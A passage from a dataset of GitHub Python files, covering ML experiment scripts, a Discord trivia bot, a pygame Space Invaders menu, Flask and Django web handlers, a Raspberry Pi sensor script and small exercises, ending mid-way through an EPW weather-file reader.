save_pickle\nfrom imblearn.under_sampling import RandomUnderSampler\nimport time\nimport os\nimport openai\n\n\ndef get_timestr():\n return time.strftime(\"%Y%m%d-%H%M%S\")\n\n\nload_dotenv(\"../../../.env\", override=True)\n\nopenai.api_key = os.environ[\"OPENAI_API_KEY\"]\n\nname_mapping = {\n \"NR-AR\": \"activity in the Androgen receptor, full length assay\",\n \"NR-AR-LBD\": \"activity in the Androgen receptor, ligand binding domain assay\",\n \"NR-AhR\": \"activity in the Aryl hydrocarbon receptor assay\",\n \"NR-Aromatase\": \"activity in the Aromatase assay\",\n \"NR-ER\": \"activity in the Estrogen receptor alpha, full length assay\",\n \"NR-ER-LBD\": \"activity in the Estrogen receptor alpha, LBD assay\",\n \"NR-PPAR-gamma\": \"activity in the PPAR-gamma receptor assay\",\n \"SR-ARE\": \"activity in the antioxidant responsive element assay\",\n \"SR-ATAD5\": \"activity in the ATPase Family AAA Domain Containing 5e assay\",\n}\n\n\ntarget_number_mapping = {\n \"NR-AR\": 0,\n \"NR-AR-LBD\": 1,\n \"NR-AhR\": 2,\n \"NR-Aromatase\": 3,\n \"NR-ER\": 4,\n \"NR-ER-LBD\": 5,\n \"NR-PPAR-gamma\": 6,\n \"SR-ARE\": 7,\n \"SR-ATAD5\": 8,\n}\n\n\ndef run_experiment(target, num_train_points, random_undersample, num_test_points, seed):\n tox21_tasks, tox21_datasets, transformers = load_tox21(seed=seed, reload=False)\n train_dataset, valid_dataset, test_dataset = tox21_datasets\n\n X_train, y_train = train_dataset.ids, train_dataset.y[:, target_number_mapping[target]]\n X_test, y_test = test_dataset.ids, test_dataset.y[:, target_number_mapping[target]]\n\n if num_train_points == \"max\":\n num_train_points = len(X_train)\n if random_undersample:\n sampler = RandomUnderSampler(random_state=seed)\n\n X_train, y_train = sampler.fit_resample(X_train.reshape(-1, 1), y_train)\n\n train_ids = np.random.choice(np.arange(len(X_train)), num_train_points, replace=False)\n test_ids = np.random.choice(np.arange(len(X_test)), num_test_points, replace=False)\n\n X_train = X_train[train_ids]\n y_train = y_train[train_ids]\n\n X_test = X_test[test_ids]\n y_test = y_test[test_ids]\n n_epochs = 8\n\n tuner = Tuner(n_epochs=n_epochs, learning_rate_multiplier=0.02, wandb_sync=False)\n classifier = GPTClassifier(\n target,\n tuner=tuner,\n save_valid_file=True,\n querier_settings={\"max_tokens\": 10},\n )\n\n classifier.fit(X_train, y_train)\n\n y_pred = classifier.predict(X_test)\n\n results = evaluate_classification(y_test, y_pred)\n\n report = {\n \"target\": target,\n \"num_train_points\": num_train_points,\n \"num_test_points\": num_test_points,\n \"random_undersample\": random_undersample,\n \"seed\": seed,\n \"y_pred\": y_pred,\n \"y_test\": y_test,\n \"n_epochs\": n_epochs,\n \"short_name\": True,\n **results,\n }\n\n timestr = get_timestr()\n\n save_pickle(\n f\"reports/{timestr}-{target}-{num_train_points}-{random_undersample}-{seed}-{n_epochs}.pkl\",\n report,\n )\n\n\ndef get_grid(random_undersample):\n if random_undersample:\n return [10, 50, 100]\n else:\n return [10, 100, 6000, \"max\"]\n\n\nif __name__ == \"__main__\":\n for seed in range(3):\n seed = seed + 54535\n for random_undersample in [True, False][::-1]:\n for target in list(name_mapping.keys())[::-1]:\n for num_train_points in get_grid(random_undersample)[::-1]:\n try:\n run_experiment(target, num_train_points, random_undersample, 500, seed)\n time.sleep(60)\n except Exception as e:\n print(e)\n 
time.sleep(60)\n","repo_name":"kjappelbaum/gptchem","sub_path":"experiments/03_classification/tox21/run_experiments.py","file_name":"run_experiments.py","file_ext":"py","file_size_in_byte":3919,"program_lang":"python","lang":"en","doc_type":"code","stars":167,"dataset":"github-code","pt":"44"} +{"seq_id":"2825378069","text":"@bot.command()\nasync def dovui(ctx):\n try:\n get = requests.get('https://api.phamvandien.xyz/game/dovui')\n data_txt = get.text\n data_json = json.loads(data_txt)\n data = {}\n question = data_json['data']['question']\n option = data_json['data']['option']\n correct = data_json['data']['correct'] \n msg = f'đây là câu hỏi của bạn: {question}'\n stt = 1\n for i in option:\n msg += f'\\n{stt}.{i}'\n data[str(stt)] = i\n stt += 1\n msg += '\\nreply tin nhắn theo số thứ tự các đáp án để trả lời'\n send = await ctx.send(msg)\n def check(m):\n return m.author.id == ctx.author.id and m.channel == ctx.channel and m.reference is not None and m.reference.message_id == send.id\n message = await bot.wait_for('message', check=check)\n try:\n if data[str(message.content)] == correct:\n await ctx.send(f'bạn đã trả lời đúng, đáp án là {correct}')\n else:\n await ctx.send(f'sai rồi, đáp án là {correct}')\n except Exception as e:\n print(e)\n await ctx.send(f'chỉ được trả lời theo số thứ tự các đáp án')\n except Exception as e:\n print(e)\n await ctx.send(f\"lệnh bạn đang sử dụng đã xảy ra lỗi, hãy báo cáo về admin bằng lệnh {get_prefix()[str(ctx.message.guild.id)]['prefix']}callad, hoặc câu trả lời của bạn không phải là một con số\")\n","repo_name":"CCcutcanh/test_discord_bot","sub_path":"dovui.py","file_name":"dovui.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"31303259437","text":"import pygame\nimport time\nimport gameFunctions as gF\n\n\nclass TitleScreen:\n def __init__(self, screen, settings):\n self.__screen = screen\n self.__settings = settings\n self.__font = pygame.font.SysFont('impact', 200)\n self.__space_text = self.__font.render('SPACE', False, (255, 255, 255))\n self.__invaders_text = self.__font.render('INVADERS', False, (0, 255, 0))\n\n self.__playImageWhite = pygame.image.load('Images/playbuttonwhite.png')\n self.__playRectWhite = self.__playImageWhite.get_rect()\n self.__playRectWhite.bottom = self.__settings.get_screen_height() - 125\n self.__playRectWhite.centerx = self.__settings.get_screen_width() / 2\n\n self.__playImageGreen = pygame.image.load('Images/playbuttongreen.png')\n self.__playRectGreen = self.__playImageGreen.get_rect()\n self.__playRectGreen.bottom = self.__playRectWhite.bottom\n self.__playRectGreen.centerx = self.__playRectWhite.centerx\n\n self.__highScoresImageWhite = pygame.image.load('Images/High Scores White.png')\n self.__whiteScoresRect = self.__highScoresImageWhite.get_rect()\n self.__whiteScoresRect.top = self.__playRectGreen.bottom + 5\n self.__whiteScoresRect.centerx = self.__playRectGreen.centerx\n\n self.__highScoresImageGreen = pygame.image.load('Images/High Scores Green.png')\n self.__greenScoresRect = self.__highScoresImageGreen.get_rect()\n self.__greenScoresRect.top = self.__whiteScoresRect.top\n self.__greenScoresRect.centerx = self.__whiteScoresRect.centerx\n\n # #######################################################################\n # Alien Images and Rects #\n ###########################################################################\n self.__ufoAlienImage = pygame.image.load('Images/ufo.png')\n 
self.__ufoAlienRect = self.__ufoAlienImage.get_rect()\n self.__ufoAlienRect.bottom = self.__playRectWhite.top - 10\n self.__ufoAlienRect.centerx = self.__playRectWhite.centerx - 150\n\n self.__purpleAlienImage = pygame.image.load('Images/Purple Alien1.png')\n self.__purpleAlienRect = self.__purpleAlienImage.get_rect()\n self.__purpleAlienRect.bottom = self.__ufoAlienRect.top\n self.__purpleAlienRect.centerx = self.__ufoAlienRect.centerx\n\n self.__blueAlienImage = pygame.image.load('Images/Blue Alien1.png')\n self.__blueAlienRect = self.__blueAlienImage.get_rect()\n self.__blueAlienRect.bottom = self.__purpleAlienRect.top\n self.__blueAlienRect.centerx = self.__purpleAlienRect.centerx\n\n self.__greenAlienImage = pygame.image.load('Images/Green Alien1.png')\n self.__greenAlienRect = self.__greenAlienImage.get_rect()\n self.__greenAlienRect.bottom = self.__blueAlienRect.top\n self.__greenAlienRect.centerx = self.__blueAlienRect.centerx\n\n # #######################################################################\n # Point Images and Rects #\n ###########################################################################\n self.__tenPointsImage = pygame.image.load('Images/ten points.png')\n self.__tenPointsRect = self.__tenPointsImage.get_rect()\n self.__tenPointsRect.left = self.__greenAlienRect.right\n self.__tenPointsRect.centery = self.__greenAlienRect.centery\n\n self.__twentyPointsImage = pygame.image.load('Images/twenty points.png')\n self.__twentyPointsRect = self.__twentyPointsImage.get_rect()\n self.__twentyPointsRect.left = self.__blueAlienRect.right\n self.__twentyPointsRect.centery = self.__blueAlienRect.centery\n\n self.__fortyPointsImage = pygame.image.load('Images/forty points.png')\n self.__fortyPointsRect = self.__fortyPointsImage.get_rect()\n self.__fortyPointsRect.left = self.__purpleAlienRect.right\n self.__fortyPointsRect.centery = self.__purpleAlienRect.centery\n\n self.__unknownPointsImage = pygame.image.load('Images/unknown points.png')\n self.__unknownPointsRect = self.__unknownPointsImage.get_rect()\n self.__unknownPointsRect.left = self.__ufoAlienRect.right\n self.__unknownPointsRect.centery = self.__ufoAlienRect.centery\n\n self.create_high_score_file()\n\n def title_loop(self):\n self.__screen.fill(self.__settings.get_bg_color())\n self.__screen.blit(self.__space_text, (self.__settings.get_screen_width() / 2.75, 0))\n self.__screen.blit(self.__invaders_text, (self.__settings.get_screen_width() / 3.35, 175))\n self.__screen.blit(self.__playImageWhite, self.__playRectWhite)\n self.__screen.blit(self.__highScoresImageWhite, self.__whiteScoresRect)\n pygame.display.flip()\n\n self.__screen.blit(self.__greenAlienImage, self.__greenAlienRect)\n pygame.display.flip()\n time.sleep(0.25)\n self.__screen.blit(self.__tenPointsImage, self.__tenPointsRect)\n pygame.display.flip()\n time.sleep(0.25)\n self.__screen.blit(self.__blueAlienImage, self.__blueAlienRect)\n pygame.display.flip()\n time.sleep(0.25)\n self.__screen.blit(self.__twentyPointsImage, self.__twentyPointsRect)\n pygame.display.flip()\n time.sleep(0.25)\n self.__screen.blit(self.__purpleAlienImage, self.__purpleAlienRect)\n pygame.display.flip()\n time.sleep(0.25)\n self.__screen.blit(self.__fortyPointsImage, self.__fortyPointsRect)\n pygame.display.flip()\n time.sleep(0.25)\n self.__screen.blit(self.__ufoAlienImage, self.__ufoAlienRect)\n pygame.display.flip()\n time.sleep(0.25)\n self.__screen.blit(self.__unknownPointsImage, self.__unknownPointsRect)\n pygame.display.flip()\n time.sleep(0.25)\n 
pygame.mouse.set_visible(True)\n\n while self.check_mouse_events():\n if self.__playRectWhite.collidepoint(pygame.mouse.get_pos()):\n self.__screen.blit(self.__playImageGreen, self.__playRectGreen)\n self.__screen.blit(self.__highScoresImageWhite, self.__whiteScoresRect)\n elif self.__whiteScoresRect.collidepoint(pygame.mouse.get_pos()):\n self.__screen.blit(self.__highScoresImageGreen, self.__greenScoresRect)\n self.__screen.blit(self.__playImageWhite, self.__playRectWhite)\n else:\n self.__screen.blit(self.__playImageWhite, self.__playRectWhite)\n self.__screen.blit(self.__highScoresImageWhite, self.__whiteScoresRect)\n pygame.display.flip()\n\n def check_mouse_events(self):\n for event in pygame.event.get():\n if event.type == pygame.MOUSEBUTTONDOWN:\n if self.__playRectGreen.collidepoint(pygame.mouse.get_pos()):\n self.__screen.fill(self.__settings.get_bg_color())\n return False\n elif self.__greenScoresRect.collidepoint(pygame.mouse.get_pos()):\n self.high_score_screen()\n self.title_loop()\n return False\n return True\n\n def high_score_screen(self):\n self.__screen.fill(self.__settings.get_bg_color())\n font = pygame.font.Font('Fonts/PixFont.ttf', 40)\n text_color = self.__settings.get_bullet_color()\n image_rect = None\n image_one_rect = None\n high_score_image = font.render(\"HIGH SCORES!\", True, text_color, self.__settings.get_bg_color())\n high_score_rect = high_score_image.get_rect()\n high_score_rect.centerx = self.__settings.get_screen_width() / 2\n high_score_rect.y = 100\n self.__screen.blit(high_score_image, high_score_rect)\n pygame.display.flip()\n try:\n with open(\"high score.txt\") as f:\n score = f.readline()\n if score == \"\":\n return\n score = score.strip('\\n')\n image_one = font.render(\"Score: {}\".format(score), True, text_color, self.__settings.get_bg_color())\n image_one_rect = image_one.get_rect()\n image_one_rect.centerx = self.__settings.get_screen_width() / 2\n image_one_rect.y = 200\n self.__screen.blit(image_one, image_one_rect)\n pygame.display.flip()\n time.sleep(0.2)\n for count in range(0, 10):\n score = f.readline()\n if score == \"\":\n break\n score = score.strip('\\n')\n image = font.render(\"Score: {}\".format(score), True, text_color, self.__settings.get_bg_color())\n image_rect = image.get_rect()\n image_rect.left = image_one_rect.left\n image_rect.top = image_one_rect.bottom\n image_one_rect = image_rect\n self.__screen.blit(image, image_rect)\n pygame.display.flip()\n time.sleep(0.2)\n except FileNotFoundError:\n pass\n continue_image = font.render(\"PRESS SPACE TO CONTINUE, Q TO EXIT\", True, text_color)\n continue_rect = continue_image.get_rect()\n try:\n continue_rect.centerx = image_rect.centerx\n continue_rect.top = image_rect.bottom + 50\n except AttributeError:\n continue_rect.centerx = image_one_rect.centerx\n continue_rect.top = image_one_rect.bottom + 50\n self.__screen.blit(continue_image, continue_rect)\n pygame.display.flip()\n while gF.wait_for_space():\n continue\n\n @staticmethod\n # Ensures a high score file is inside directory. If one is not there, makes one. 
If it is there, it does nothing.\n def create_high_score_file():\n try:\n with open('high score.txt', 'r') as f:\n f.close()\n except FileNotFoundError:\n with open('high score.txt', 'w') as f:\n f.write(\"0000\")\n","repo_name":"Mbraun5/Space-Invaders","sub_path":"titleScreen.py","file_name":"titleScreen.py","file_ext":"py","file_size_in_byte":10080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"43694397341","text":"from Bio import SeqIO\nfrom Bio.PDB import *\n\n\n# XXXX_anything, I want firts 4 characters in lowercase\ndef TrimPDBName(fastaName):\n return fastaName[:4].lower()\n\n\n# XXXX_A_anything, I want A\ndef GetChainID(fastaName):\n return fastaName[5:6]\n\n\ndef GetFastaNAmeFromFileName(fileName):\n return fileName[:6]\n\n\nCONST_SEC_STR_FOLDER = '../secondary_structures/'\n\n\ndef __makeSecStrName__(rawName):\n return CONST_SEC_STR_FOLDER + rawName + \".secstr\"\n\n\n# expects fastaName like XXXX_A.anything\n# seondary structure is on second line\ndef LoadSecondaryStructure(fastaName):\n rawName = GetFastaNAmeFromFileName(fastaName)\n with open(__makeSecStrName__(rawName), 'r') as file:\n sequence_raw = file.readline()\n sequence = \"\"\n for res in sequence_raw:\n if res.upper() in ('A', 'G', 'C', 'U'):\n sequence += res.upper()\n secondaryStructure_raw = file.readline()\n secondaryStructure = \"\"\n for res in secondaryStructure_raw:\n if res.upper() in ('.', '(', ')', '[', ']'):\n secondaryStructure += res.upper()\n return {'sequence': sequence, 'sec_str': secondaryStructure}\n\n\ndef ListOfPairsToFiles(zeroIndexFileName, listOfPairs):\n fileZero = open(zeroIndexFileName, 'w')\n fileZero.write(\">SEQ:\\n\")\n for pair in listOfPairs:\n fileZero.write(pair[0])\n fileZero.write('\\n')\n for pair in listOfPairs:\n fileZero.write(pair[1])\n fileZero.close()\n\n\n# compare order of fasta file and corresponding pdb file\ndef check_order_of_fasta_and_pdb(input_pdb, chain_id, fasta, fasta_shift=0):\n parser_pdb = PDBParser()\n structure = parser_pdb.get_structure('self', input_pdb)\n model = structure[0]\n chain = model[chain_id]\n records = list(SeqIO.parse(fasta, \"fasta\"))\n fasta_seq = \"\"\n for r in records[0]:\n fasta_seq = fasta_seq + r\n fasta_seq = \"x\"+fasta_seq+\"x\"\n for i in range(0, fasta_shift):\n fasta_seq = \"y\" + fasta_seq\n b = True\n for res in chain:\n if res.id[1] >= len(fasta_seq):\n b = False\n break\n if res.resname[2] != fasta_seq[res.id[1]]:\n b = False\n return b\n\n\n# select only ATOM lines with correct chain_id to template\ndef select_relevant_chain_from_template_pdb(pdb, chain_id):\n import re\n with open(\"template.pdb\", \"wb\") as modified_pdb:\n with open(pdb, 'r') as original_pdb:\n for line in original_pdb.readlines():\n if re.match('ATOM.................'+chain_id, line):\n modified_pdb.write(line)\n\n\n\ndef load_fasta(fasta_file):\n from Bio import SeqIO\n FastaFile = open(\"../fastas/\" + fasta_file.upper() + \".fasta\", 'rU')\n for rec in SeqIO.parse(FastaFile, 'fasta'):\n name = rec.id\n seq = rec.seq\n seqLen = len(rec)\n FastaFile.close()\n return seq\n\n\n\n# Inserts new inside original at pos.\ndef insert_char_to_str(original, new, pos):\n return original[:pos] + new + original[pos:]\n\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = 
'\\033[4m'\n","repo_name":"galvaner/Trooper","sub_path":"Predictor/scripts/Helper.py","file_name":"Helper.py","file_ext":"py","file_size_in_byte":3195,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"745373137","text":"\"\"\"This module provides loaders for dataset such as cifar.\"\"\"\nimport os\nimport tensorflow as tf\n\n\ndef _cifar10_parser_fn(image_width, image_height, with_label):\n \"\"\"Get Cifar10 sample parser function.\"\"\"\n\n def parser(value):\n value = tf.io.decode_raw(value, tf.uint8)\n image = tf.reshape(value[1:], [3, 32, 32])\n image = tf.image.convert_image_dtype(image, tf.float32)\n image = tf.transpose(image, [1, 2, 0])\n if image_width != 32 or image_height != 32:\n image = tf.image.resize([image], [image_height, image_width])[0]\n image.set_shape([image_height, image_width, 3])\n if with_label:\n return image, tf.cast(value[0], tf.int32)\n return image\n\n return parser\n\n\ndef _get_cifar10_files(data_dir):\n \"\"\"Get binary files in folder.\"\"\"\n return [os.path.join(data_dir, f\"data_batch_{i}.bin\") for i in range(1, 6)]\n\n\ndef get_cifar10_labeled_train_ds(data_dir, image_width, image_height):\n \"\"\"Load labeled cifar10 dataset for training.\"\"\"\n num_samples = 4000\n filenames = _get_cifar10_files(data_dir)\n record_bytes = 1 + (3 * 32 * 32)\n dataset = tf.data.FixedLengthRecordDataset(filenames, record_bytes)\n dataset = dataset.take(num_samples)\n dataset = dataset.map(_cifar10_parser_fn(image_width, image_height, True), num_parallel_calls=tf.data.experimental.AUTOTUNE)\n return dataset, num_samples\n\n\ndef get_cifar10_unlabeled_train_ds(data_dir, image_width, image_height):\n \"\"\"Load unlabeled cifar10 dataset for training.\"\"\"\n filenames = _get_cifar10_files(data_dir)\n record_bytes = 1 + (3 * 32 * 32)\n dataset = tf.data.FixedLengthRecordDataset(filenames, record_bytes)\n dataset = dataset.map(_cifar10_parser_fn(image_width, image_height, False), num_parallel_calls=tf.data.experimental.AUTOTUNE)\n return dataset\n\n\ndef get_cifar10_val_ds(data_path, image_width, image_height):\n \"\"\"Load cifar10 dataset for validation.\"\"\"\n filenames = [os.path.join(data_path, \"test_batch.bin\")]\n record_bytes = 1 + (3 * 32 * 32)\n dataset = tf.data.FixedLengthRecordDataset(filenames, record_bytes)\n dataset = dataset.map(_cifar10_parser_fn(image_width, image_height, True), num_parallel_calls=tf.data.experimental.AUTOTUNE)\n return dataset\n","repo_name":"retoschiegg/meta-pseudo-labels","sub_path":"src/utils/data_util.py","file_name":"data_util.py","file_ext":"py","file_size_in_byte":2264,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"44"} +{"seq_id":"13431020483","text":"from flask import Flask, request, jsonify, render_template\nfrom dotenv import load_dotenv\nimport openai\nimport os\nimport io\nimport datetime\nfrom ._utils.firebase_utils import add_data, get_data, set_data\n# comment\napp = Flask(__name__)\n\nMODELS = ['gpt-3.5-turbo', 'gpt-3.5-turbo-16k']\n\ndef completion_text(c):\n return c[\"choices\"][0][\"message\"][\"content\"]\n\ndef write_gpt_log(filename, response, instructions, transcript):\n instructions = \"\" if instructions is None else instructions\n output = ''\n output+=response\n output+=\"\\n\\n\\n\\n\\n\\n-------SYSTEM--------\\n\"\n output+=instructions\n output+=\"\\n\\n\\n\\n\\n\\n-------USER--------\\n\"\n output+=transcript\n add_data('logs',{'output': output})\n\n\n#region Random Helper Functions\ndef 
read_ref(file):\n filepath = os.path.join(\"backend\", \"refs\", file)\n with open(filepath, \"r\") as f:\n output = f.read()\n return output\ndef read_message(file):\n filepath = os.path.join(\"messages\", file)\n with open(filepath, \"r\") as f:\n output = f.read()\n return output\n#endregion\n\ndef gpt(model_num, sys,usr, log_name):\n print('GPT Called: ' + MODELS[model_num])\n\n if sys is not None:\n completion = openai.ChatCompletion.create(\n model=MODELS[model_num], \n messages=[\n {\"role\": \"system\", \"content\": sys},\n {\"role\": \"user\", \"content\": usr}\n ]\n )\n else: \n completion = openai.ChatCompletion.create(\n model=MODELS[model_num], \n messages=[\n {\"role\": \"user\", \"content\": usr}\n ]\n )\n write_gpt_log(log_name, completion_text(completion), sys, usr)\n return completion\n\n@app.route('/api/processes/main')\ndef process():\n pass\n\n@app.route('/api/processes/test')\ndef test():\n load_dotenv()\n system = read_message('01_system')\n\n openai.api_key = os.getenv('API_KEY')\n add_data(\"test\",{\"Test\": \"Value\"})\n response = completion_text(gpt(0, \"You are a summarizer. Summarizer whatever you see, whether it be a question or document\", system, \"lognameirrelevant\"))\n add_data(\"test\", {\"conversion_result\":response})\n return jsonify({'message': 'Job starting', 'response':system})\n\n@app.route('/api/openai')\ndef about():\n return jsonify({'message': 'OpenAI Test'})","repo_name":"ryanmyang/Customizable_AI_Summarizer","sub_path":"frontend/ai-summarizer-ui/api/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73539035654","text":"from app import app, create_connection, get_airports\nfrom flask import request, jsonify\n\n\n@app.route(\"/_get_airports\", methods=[\"GET\"])\ndef return_airports():\n def _format_string(city, code):\n return \"{city} ({code})\".format(city=city, code=code)\n\n airports = get_airports()\n airport = str(request.args.get(\"airport\"))\n\n if not airport:\n return \"OK\"\n\n airports = {airport[\"code\"]: airport[\"city\"] for airport in airports}\n\n query = \"\"\"\n SELECT DISTINCT from_airport, GROUP_CONCAT(DISTINCT to_airport ORDER BY to_airport SEPARATOR \",\") as to_airport\n FROM flight\n WHERE from_airport=%s\n GROUP BY from_airport\n \"\"\"\n\n cnx = create_connection()\n cursor = cnx.cursor()\n cursor.execute(query, airport)\n route = cursor.fetchone()\n cursor.close()\n cnx.close()\n\n destinations = [\n {\"value\": code, \"text\": _format_string(airports[code], code)}\n for code in route[\"to_airport\"].split(\",\")\n ]\n\n return jsonify(result=destinations)\n","repo_name":"STiXzoOR/up-flightfinder","sub_path":"app/routes/airport.py","file_name":"airport.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"1837696059","text":"import numpy as np \nimport pandas as pd \n\ndef costFunction(X, y, theta, m):\n\n\t#hypothesis\n\tHx = X.dot(theta)\n\t#calculating mean square error\n\tdiff = np.subtract(Hx, y)\n\tsquareError = np.square(diff)\n\ttotalError = np.sum(squareError)\n\tJ = (1.0/float(2 * m)) * totalError\n\n\treturn J","repo_name":"sleepy0owl/LinearReg","sub_path":"costFunction.py","file_name":"costFunction.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} 
+{"seq_id":"43663658703","text":"#!/usr/bin/env python\nimport time\nimport RPi.GPIO as GPIO\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\npir = 5\npled = 12\nGPIO.setup(pir, GPIO.IN)\nGPIO.setup(pled, GPIO.OUT)\nif (GPIO.input(pir)):\n print(\"1\")\n GPIO.output(pled, GPIO.HIGH)\n # mouvement\nelse:\n print(\"0\")\n # pas de mouvement\n GPIO.output(pled, GPIO.LOW)\n","repo_name":"achorein/jeedom-rpi-scripts","sub_path":"readMvt.py","file_name":"readMvt.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"24015471085","text":"# encoding: utf-8\r\nimport pymongo\r\nfrom bson.objectid import ObjectId\r\nfrom django.views.decorators.csrf import csrf_exempt\r\nfrom realblog.func import connect_blog_database, render_admin_and_back, redirect\r\n\r\n__author__ = '在何方'\r\n\r\ndef show_all(request):\r\n db = connect_blog_database(request)\r\n info = db.infos.find_one()\r\n categories = list(db.categories.find(sort=[('Order', pymongo.ASCENDING)]))\r\n for category in categories:\r\n category['Id'] = str(category['_id'])\r\n\r\n return render_admin_and_back(request, 'show-categories.html', {\r\n 'page':u'分类',\r\n 'categories':categories,\r\n 'selection':'categories',\r\n })\r\n\r\n@csrf_exempt\r\ndef new(request):\r\n\r\n db = connect_blog_database(request)\r\n\r\n # 普通访问\r\n if request.method == 'GET':\r\n return render_admin_and_back(request, 'edit-category.html', {\r\n 'page':u'新分类',\r\n })\r\n\r\n elif request.method == 'POST':\r\n\r\n d = request.POST\r\n order = int(d['category-order']) if d['category-order'] else 0\r\n update = {\r\n 'Title':d['category-title'],\r\n 'Description':d['category-description'],\r\n 'Order': order,\r\n }\r\n # 插入新的Category\r\n db.categories.insert(update)\r\n\r\n # 对链接重新排序\r\n categories = list(db.categories.find(sort=[('Order', pymongo.ASCENDING)]))\r\n for i in xrange(0, len(categories)):\r\n if categories[i]['Order'] != i:\r\n db.categories.update(categories[i], {\"$set\":{'Order': i}})\r\n\r\n return redirect(request, '新建分类成功', 'admin/show-categories/')\r\n\r\ndef update_category_of_articles(coll, old_cat, new_cat):\r\n \"\"\"\r\n 更新文章集合的分类\r\n \"\"\"\r\n old = old_cat['Title']\r\n new = new_cat['Title']\r\n if old != new:\r\n for a in coll.find({'Categories': old}):\r\n array = a['Categories']\r\n array[array.index(old)] = new\r\n coll.update({'Id': a['Id']}, {'$set': {'Categories': array}})\r\n\r\n@csrf_exempt\r\ndef edit(request, objectId):\r\n\r\n db = connect_blog_database(request)\r\n id = ObjectId(objectId)\r\n\r\n # 普通访问\r\n if request.method == 'GET':\r\n\r\n category = db.categories.find_one({'_id':id})\r\n return render_admin_and_back(request, 'edit-category.html', {\r\n 'page':u'编辑分类',\r\n 'category': category,\r\n })\r\n\r\n elif request.method == 'POST':\r\n\r\n d = request.POST\r\n order = int(d['category-order']) if d['category-order'] else 0\r\n update = {\r\n 'Title':d['category-title'],\r\n 'Description':d['category-description'],\r\n 'Order':order,\r\n }\r\n # 取得所有Category\r\n categories = list(db.categories.find(sort=[('Order', pymongo.ASCENDING)]))\r\n\r\n # 创建或取得编辑中的Category\r\n category = filter(lambda i: i['_id'] == id, categories)[0]\r\n db.categories.update(category, {'$set': update})\r\n categories.remove(category)\r\n categories.insert(order, category)\r\n\r\n # 对所有链接重新排序\r\n for i in xrange(0, len(categories)):\r\n if categories[i]['Order'] != i:\r\n db.categories.update(categories[i], {\"$set\":{'Order': i}})\r\n\r\n # 
更新所有文章的分类\r\n update_category_of_articles(db.articles, category, update)\r\n update_category_of_articles(db.hidden_articles, category, update)\r\n\r\n return redirect(request, '编辑分类成功', 'admin/show-categories/')\r\n\r\n@csrf_exempt\r\ndef delete(request, objectId):\r\n\r\n db = connect_blog_database(request)\r\n id = ObjectId(objectId)\r\n\r\n if request.method == 'GET':\r\n\r\n db.categories.remove({'_id':id})\r\n\r\n # 取得所有Category\r\n categories = list(db.categories.find(sort=[('Order', pymongo.ASCENDING)]))\r\n\r\n # 对所有链接重新排序\r\n for i in xrange(0, len(categories)):\r\n if categories[i]['Order'] != i:\r\n db.categories.update(categories[i], {\"$set\":{'Order': i}})\r\n\r\n return redirect(request, '删除分类成功', 'admin/show-categories/')","repo_name":"kailunio/RealBlog","sub_path":"realblog/admin/category.py","file_name":"category.py","file_ext":"py","file_size_in_byte":4197,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"44"} +{"seq_id":"25887471589","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# 现有面包、热狗、番茄酱、芥末酱以及洋葱,数字显示有多少种订购组合\n# 其中面包必订,0不订,1订,比如10000,表示只订购面包\n\nimport pprint\n\ncount = 0\nfor bread in[1]:\n for hotdog in[0,1]:\n for ketchup in[0,1]:\n for wasabi in[0,1]:\n for onion in[0,1]:\n print(bread,hotdog,ketchup,wasabi,onion)\n count += 1\nprint(\"There are \",count,\" kinds of type!\")","repo_name":"maohaoyang369/Python_exercise","sub_path":"090.现有面包、热狗、番茄酱、芥末酱以及洋葱,数字显示有多少种订购组合.py","file_name":"090.现有面包、热狗、番茄酱、芥末酱以及洋葱,数字显示有多少种订购组合.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"38368541656","text":"class Stack:\n\n def __init__(self):\n self.stack = []\n\n def push (self, value):\n self.stack.append(value)\n\n def pop (self):\n return self.stack.pop(len (self.stack) - 1)\n\ninp = input ()\ninplst = inp.split()\nstack = Stack ()\nfor inp in inplst:\n if inp[1:].isdigit() and inp[0] == '-':\n inp = -1 * eval (inp[1:])\n elif inp.isdigit():\n inp = eval (inp)\n if (type(inp) != int) and (inp != '+') and (inp != '-') and (inp != '*'):\n continue\n if type(inp) == int:\n stack.push(inp)\n else:\n a = stack.pop()\n b = stack.pop()\n if inp == '+':\n a = b + a\n stack.push (a)\n elif inp == '-':\n a = b - a\n stack.push (a)\n else:\n a = b * a\n stack.push (a)\n\nprint (stack.pop ())\n","repo_name":"zvonand/sem3_python","sub_path":"hw8/task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"25919340106","text":"from pyepw.epw import EPW\nimport csv\nimport re\nimport json\nimport dash\nfrom dash.dependencies import Input, Output\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport os\nimport plotly.graph_objs as go\nimport pandas as pd\n\n## read epw file names\ndef ReadFileNameInCsv(dir):\n '''\n This function reads the file names stored in a .csv file\n :param dir: This is the path to the directory in which the csv files are located (relative to the working directory)\n :return: A list object in which each element is a file name as a string\n '''\n with open(dir, 'rt') as f:\n 